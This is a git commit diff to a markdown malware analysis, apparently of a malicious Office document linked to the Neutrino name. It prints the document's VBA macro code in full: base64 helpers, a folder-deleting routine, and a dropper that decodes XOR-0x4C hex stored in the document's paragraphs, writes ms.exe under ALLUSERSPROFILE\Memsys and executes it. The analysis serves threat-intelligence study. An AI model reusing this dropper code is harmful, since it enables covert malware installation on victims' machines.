Update Analysis_2020-02-08.md

2020-02-09 16:02:50 +01:00 · 2020-02-09 16:02:50 +01:00 · a7423a9db2
commit a7423a9db2
parent 51e79994af
1 changed files with 194 additions and 5 deletions
--- a/Analysis/Neutrino/Analysis_2020-02-08.md
+++ b/Analysis/Neutrino/Analysis_2020-02-08.md
@ -50,15 +50,204 @@ Private Sub Workbook_Open()
 End Sub
 ```

-</li>
+<h6>This used an intermediate function for execute the main function.</h6>
+
+``` VBA
+Sub AddSpace()
+ RemoveParagraph
+End Sub
+```
+
+<h6> The first two functions used by the macro are for encoded and decode in base 64 in using multiples interations of the data.</h6>
+
+``` VBA
+Public Function Encode64(sString As String) As String
+ Dim bTrans(63) As Byte, OOOPOOOOPOOOO8(255) As Long, OOOPOOOOPOOOO16(255) As Long, bOut() As Byte, bIn() As Byte
+ Dim var_B As Long, lTrip As Long, iPad As Integer, lLen As Long, i As Long, var_A As Long, lOutSize As Long
+ For i = 0 To 63
+  Select Case i
+   Case 0 To 25
+    bTrans(i) = 65 + i
+   Case 26 To 51
+    bTrans(i) = 71 + i
+   Case 52 To 61
+    bTrans(i) = i - 4
+   Case 62
+    bTrans(i) = 43
+   Case 63
+    bTrans(i) = 47
+  End Select
+ Next i
+ For i = 0 To 255
+  OOOPOOOOPOOOO8(i) = i * 256
+  OOOPOOOOPOOOO16(i) = i * 65536
+ Next i
+ iPad = Len(sString) Mod 3
+ If iPad Then
+  iPad = 3 - iPad
+  sString = sString & String(iPad, Chr(0))
+ End If
+ bIn = StrConv(sString, vbFromUnicode)
+ lLen = ((UBound(bIn) + 1) \ 3) * 4
+ i = lLen \ 72
+ lOutSize = ((i * 2) + lLen) - 1
+ ReDim bOut(lOutSize)
+ lLen = 0
+ For var_B = LBound(bIn) To UBound(bIn) Step 3
+  lTrip = OOOPOOOOPOOOO16(bIn(var_B)) + OOOPOOOOPOOOO8(bIn(var_B + 1)) + bIn(var_B + 2)
+  i = lTrip And 16515072
+  bOut(var_A) = bTrans(i \ 262144)
+  i = lTrip And 258048
+  bOut(var_A + 1) = bTrans(i \ 4096)
+  i = lTrip And 4032
+  bOut(var_A + 2) = bTrans(i \ 64)
+  bOut(var_A + 3) = bTrans(lTrip And 63)
+  If lLen = 68 Then
+   bOut(var_A + 4) = 13
+   bOut(var_A + 5) = 10
+   lLen = 0
+   var_A = var_A + 6
+  Else
+   lLen = lLen + 4
+   var_A = var_A + 4
+  End If
+ Next var_B
+ If bOut(lOutSize) = 10 Then lOutSize = lOutSize - 2
+ If iPad = 1 Then
+  bOut(lOutSize) = 61
+ ElseIf iPad = 2 Then
+  bOut(lOutSize) = 61
+  bOut(lOutSize - 1) = 61
+ End If
+ Encode64 = StrConv(bOut, vbUnicode)
+End Function
+
+Public Function Decrypt(sString As String) As String
+ Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, OOOPOOOOPOOOO6(63) As Long, OOOPOOOOPOOOO12(63) As Long
+ Dim OOOPOOOOPOOOO18(63) As Long, lQuad As Long, iPad As Integer, var_B As Long, var_A As Long, sOut As String
+ Dim i As Long
+ sString = Replace(sString, vbCr, vbNullString)
+ sString = Replace(sString, vbLf, vbNullString)
+ i = Len(sString) Mod 4
+ If InStrRev(sString, "==") Then
+  iPad = 2
+ ElseIf InStrRev(sString, "=") Then
+  iPad = 1
+ End If
+ For i = 0 To 255
+  Select Case i
+   Case 65 To 90
+    bTrans(i) = i - 65
+   Case 97 To 122
+    bTrans(i) = i - 71
+   Case 48 To 57
+    bTrans(i) = i + 4
+   Case 43
+    bTrans(i) = 62
+   Case 47
+    bTrans(i) = 63
+  End Select
+ Next i
+ For i = 0 To 63
+  OOOPOOOOPOOOO6(i) = i * 64
+  OOOPOOOOPOOOO12(i) = i * 4096
+  OOOPOOOOPOOOO18(i) = i * 262144
+ Next i
+ bIn = StrConv(sString, vbFromUnicode)
+ ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
+ For var_B = 0 To UBound(bIn) Step 4
+  lQuad = OOOPOOOOPOOOO18(bTrans(bIn(var_B))) + OOOPOOOOPOOOO12(bTrans(bIn(var_B + 1))) +  OOOPOOOOPOOOO6(bTrans(bIn(var_B + 2))) + bTrans(bIn(var_B + 3))
+  i = lQuad And 16711680
+  bOut(var_A) = i \ 65536
+  i = lQuad And 65280
+  bOut(var_A + 1) = i \ 256
+  bOut(var_A + 2) = lQuad And 255
+  var_A = var_A + 3
+ Next var_B
+ sOut = StrConv(bOut, vbUnicode)
+ If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
+ Decrypt = sOut
+End Function
+```
+
+<h6>The next function is for delete the existing content.</h6>
+
+``` VBA
+Public Sub Wipedir(path As String)
+    Dim ScriptingObj
+    Set ScriptingObj = CreateObject("Scripting.FileSystemObject")
+    If ScriptingObj.folderexists(path) Then
+        ScriptingObj.deletefolder path
+    Else
+        End
+    End If
+End Sub
+```
+
+<h6>The last functions are the main function and that allow to execute the macro. This xor the content of the data by 76 (0x4C), write in on the all users location and execute the loader.</h6>
+
+``` VBA
+Sub RemoveParagraph()
+ Dim j As Integer
+ Dim Name_Payload As String
+ Dim Path As String
+ Dim FreeFileSlot As Integer
+ Dim para As Paragraph
+ Dim i As Long
+ Dim data_para As String
+ Dim Byte_payload As Byte
+ Dim Unknown_Ref As String
+ Unknown_Ref = "Startincex"
+ Path = Environ("ALLUSERSPROFILE") + "\Memsys"
+ If Len(dir(Path, vbDirectory)) = 0 Then
+  MkDir (Decrypt(Encode64(Path)))
+ Else:
+  Wipedir (Path)
+  MkDir (Decrypt(Encode64(Path)))
+ End If
+ Name_Payload = "ms.exe"
+ ChDrive (Path)
+ ChDir (Decrypt(Encode64(Path)))
+ FreeFileSlot = FreeFile()
+ Open Name_Payload For Binary As FreeFileSlot
+ j = 0
+ For Each para In ActiveDocument.Paragraphs
+  DoEvents
+   data_para = para.Range.Text
+   i = 1
+   j = j + 1
+  If j >= 24 Then
+   While (i < Len(data_para))
+ Byte_payload = "&H" & Mid(data_para, i, 2)
+ Byte_payload = Byte_payload Xor &H4C ' Xor 76
+ Put #FreeFileSlot, , Byte_payload
+ i = i + 2
+   Wend
+  End If
+ Next
+ Close #FreeFileSlot
+ Exec (Name_Payload)
+End Sub
+
+Sub Exec(Name_Payload0 As String)
+ Dim Path As String
+ Dim OBsGG
+ Path = Environ("ALLUSERSPROFILE") + "\Memsys"
+ ChDrive (Path)
+ ChDir (Decrypt(Encode64(Path)))
+ OBsGG = Shell((Path + "\ms.exe"), 1)
+End Sub
+```
+
+
+
+    
+
+<h2>Threat Intelligence</h2><a name="Intel"></a></h2>
 <p align="center">
  <img src="">
 </p>
 <p align="center">
-    
-
-<h2>Threat Intelligence</h2><a name="Intel"></a></h2>
-
 <h2> Cyber kill chain <a name="Cyber-kill-chain"></a></h2>
 <h6>The process graph resume cyber kill chains used by the attacker :</h6>
 <p align="center">